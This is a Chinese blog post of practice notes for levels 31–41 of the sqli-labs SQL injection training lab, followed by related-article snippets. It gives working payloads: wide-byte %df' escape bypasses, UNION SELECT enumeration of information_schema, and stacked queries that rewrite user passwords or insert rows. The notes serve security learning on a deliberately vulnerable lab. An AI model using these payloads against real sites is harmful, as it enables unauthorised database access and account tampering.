Sql-labs 第31 - 41关 通过笔记

已于 2022-10-09 18:13:18 修改
阅读量233 收藏
点赞数
文章标签: sql 数据库 安全 mysql
于 2022-10-08 22:27:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45619494/article/details/127217669
版权

第31关
通过 ?id=1")
?id=1"):%00
发现页面数据不一样,说明可能为")闭合
?id=1') order by 4 ;%00
页面出现问题
发现还是跟 less-1 差不多,就是用 ")闭合而已
(百度发现是搭配waf?????)

第32关
试了下很多种闭合方式,页面都没变化!
只好去看源码了,发现 \\ ,\ 吧 ‘ ” 转义了,可能为宽字节注入
?id=-1%df’  发现页面不一样了
输入
?id=-1%df’;%00 发现页面正常
说明就是可以宽字节注入
试试报错
?id=-1%df%27%20union%20select%201,2,3;%00
成功!
?id=-1%df%27%20union%20select%201,2,database();%00
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';%00
发现没用,试试吧'security' 换成 database()
发现页面回显,为security的问题,试试16进制编码
0x7365637572697479
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479;%00
成功爆出


第33关
用半自动化闭合脚本扫一下
发现 只有 %df'可以,应该也是宽字节注入
其他32关差不多
发现 xpath 也可以

第34关
先用 admin
admin
登录,发现有回显,抓包看看
发现有 uname 和 passwd ,应该可能为注入点,试试
uname=admin' 发现出现了/,转义了,试试宽字节注入
uname=admin%df'
 发现页面出错,就是宽字节了
uname=admin%df' union select 1,2--+发现爆出,其他就跟32关差不多

第35关
发现是数字型??
直接注入
?id=-1 union select 1,2,3
爆了??
最后真的是数字型。。

第36关
用半自动化闭合脚本扫一下
发现是 %df' 闭合,宽字节咯
?id=1%df' --+
?id=1%df' order by 3 --+
?id=-1%df' union select 1,2,3--+
发现回显,其他都差不多,就是名字啥的用hex编码
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+
。。

第37关
发现是 post 的宽字节
跟36差不多

第38关
堆叠注入
先看闭合,为 '
;update users set password='123444444' where username='Dumb' --+


第39关
判断为数字型
堆叠注入
;insert users value(26,Sun,1234)
id=26,成功注入

第40关
没用报错信息
但是页面不一样,可以作为判断闭合依据
发现 ') 闭合
堆叠注入
;update users set password='Dumb' where username='Dumb' --+
更新了!

第41关
跟40关基本一样

SunMMory
关注
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs 41---64
hecker_chicken的博客
02-16 437
Sqli-labs Less-41没有回显位置 采用盲注 ?id=1 and left(version(),1)=5%23(注入成功 显示) 联合注入?id=0 union select 1,database(),version()–+ (无闭合) 我在sql注入天书看到另外一种方法 index.php?id=1; insert into users(id,username,passw...
sqli-labs通(less41~less50)
箭雨镜屋
09-16 1935
Less41和Less40差不多,先通过布尔盲注来
(手工)【sqli-labs40、41】堆叠注入、盲注
07-15 1707
SQL-堆叠、盲注】
sqli-labs 41-65
jinhezhai的博客
02-08 399
sql-labs 41-65
sql-lab 26~31总结(后续持续更新)(含参数污染解释)
m0_62879498的博客
01-15 738
sql-lab 26: 在一开始我们先尝试使用?id=1’ and 1=2 – q,发现 在注释过程中 and 和 – q都没有生效,说明它将我们的这些东西都给过滤除去 我们先观察它的源码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.or
sql-labs通技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
在实际操作中,你可以通过PHPStudy建立环境,然后部署DVWA和SQL-li-labs,逐一攻破每一个安全挑战,这将有助于提升对Web安全的意识和应对能力。 总结一下,这个压缩包提供了一套完整的Web安全学习和实践环境,包括...
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
安装upload-labs
10-22
安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 安装upload-labs的...
sqllabs less--29~31
m0_51607644的博客
01-31 173
首先介绍一下 29,30,31 这三的基本情况: 服务器端有两个部分:第一部分为 tomcat 为引擎的 jsp 型服务器,第二部分为 apache 63 Mysql 注入—sqlilabs—lcamry 为引擎的 php 服务器,真正提供 web 服务的是 php 服务器。工作流程为:client 访问服务器, 能直接访问到 tomcat 服务器,然后 tomcat 服务器再向 apache 服务器请求数据。数据返回 路径则相反。 此处简单介绍一下相环境的搭建。环境为 ubuntu14.04。此处以.
sqli-labs详细全解31-40
qq_38415434的博客
01-11 985
sqli-labs详细全解31-40 第三十一: login.php 只对第一个参数进行了检测,而第二个参数并没有进行过滤。 payload:id=2&amp;amp;amp;id=1&amp;quot;) and 1=12-- - 第三十二: f
sqli-labs 31-65
sy15890481860的博客
02-23 311
sqli-labs 31-65 Less-31: 双引号加括号闭合,详29。 Less-32: 可以进行尝试payload为: http://127.0.0.1/sqli-labs/Less-32/?id=-1%df%27union%20select%201,user(),3–+ 可以看到绕过了对于 ’ 的过滤。考虑backgroud的第一个思路,添加一个%df 后,将%5c 吃掉即可。 Le...
SQLI-LAB  的 实战记录(Less 31 - Less 40)
这块盾牌有待改良
07-20 3269
Less - 31 Protection with WAF Less - 32 Bypass addslashes Less - 33 Bypass addslashes Less - 34 Bypass Add SLASHES
毕业设计_基于springboot+layui+mybatisPlus的中小型仓库物流管理系统源码+SQL+教程+可运行】41004
pingguocu3的博客
10-04 891
毕业设计--课程设计--springboot--java 登录管理员账号:system 密码:123456 验证码输入:注意验证码字母要大写。启动项目后运行http://locahost:8080跳转到登录界面即可。后端:springboot、mybatis-plus、shiro。application.yml文件中的数据库连接信息。运行sql目录下的warehouse.sql文件。1.基础管理:商品管理、客户管理、供应商管理;2.物流管理:进货管理、发货管理、交付管理...
实用SQL小总结
UntifA的博客
09-29 1509
SQL记录
PostgreSQL的WAL日志优化及验证
最新发布
Java_fenxiang的博客
10-05 642
在应用负载不变的情况下可以通过如下方法进行WAL优化登录后复制 1) 延长checkpoint时间间隔 FPI产生于checkpoint之后第一次变脏的page,在下次checkpoint到来之前,已经输出过FPI的page是不在需要再次输出FPI。因此checkpoint时间间隔越长,FPI产生的频度会越低。增大ch...
PostgreSQL 字段使用pglz压缩测试
文牧之的博客
09-30 629
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 544
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值